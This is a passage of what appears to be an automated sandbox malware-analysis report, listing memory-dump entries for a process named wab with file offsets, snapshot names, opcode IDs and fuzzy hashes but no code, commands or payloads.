                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f47491031c7cba1e5609bd0284ae005b143b64bcc5724a78225dcd9eb5357c79
                                              • Instruction ID: 10ba60f699e893931eb7850f1c7e25e6c0dd171e8c4ced70c7ec72ff0a8bcb6f
                                              • Opcode Fuzzy Hash: f47491031c7cba1e5609bd0284ae005b143b64bcc5724a78225dcd9eb5357c79
                                              • Instruction Fuzzy Hash: CBF0AF35B002189FDB10CBA9D844BDEB7F1FF88326F1482A5E129B72D4C639D9158BA0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 64e01a5e414b0e557d5651d2e84ee672bf453d427dfbf85969796cf9b23f08e3
                                              • Instruction ID: c4d1a92a55d0c1c1e19c155243e414cb5d60fba18d024a7c37c3c60cb4f876fe
                                              • Opcode Fuzzy Hash: 64e01a5e414b0e557d5651d2e84ee672bf453d427dfbf85969796cf9b23f08e3
                                              • Instruction Fuzzy Hash: EAF0E23230021CAF8F099E98A8008AF7FABEBCC360B44402AF509C3350CA364C1297B1
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1e207c4fdaa7817331db9097ba8a0cc3132d10df0a0446b8dadcb2b6bc715759
                                              • Instruction ID: 7a775c17f5623ea50aa1dfef49e3487b34a93063ee534ac6328be6771a0b6dbd
                                              • Opcode Fuzzy Hash: 1e207c4fdaa7817331db9097ba8a0cc3132d10df0a0446b8dadcb2b6bc715759
                                              • Instruction Fuzzy Hash: 8DF0A736A1222897DB589565D8009DBB33AFB84754F104429ED00F7340DA31A805C7D0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 13cdec2ab24e8b4afe44cb77bdf91fa4f6f07f188b445225f2b189738d96bc6e
                                              • Instruction ID: 8a03cdf349ef9a5918a2f487a4e9f9a192f38bb1a145cbcf6e9739f65f26e6fb
                                              • Opcode Fuzzy Hash: 13cdec2ab24e8b4afe44cb77bdf91fa4f6f07f188b445225f2b189738d96bc6e
                                              • Instruction Fuzzy Hash: A1F0A0B1E002599FD754DEB888103EFBFF6AB99254F40847AD44AEB205E235C601CBC0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ba7ec80cab7cf9c5e8529a578076009bcad23675058736065856c60ca0adee22
                                              • Instruction ID: 70462902042db218cb88e7287e863b9102b1706a57906622d8ee3ab1c0808700
                                              • Opcode Fuzzy Hash: ba7ec80cab7cf9c5e8529a578076009bcad23675058736065856c60ca0adee22
                                              • Instruction Fuzzy Hash: A4E04FB5E003199FDB54DEB99C1139F7BF8EB58254F408476D809EB200F634C6008BD1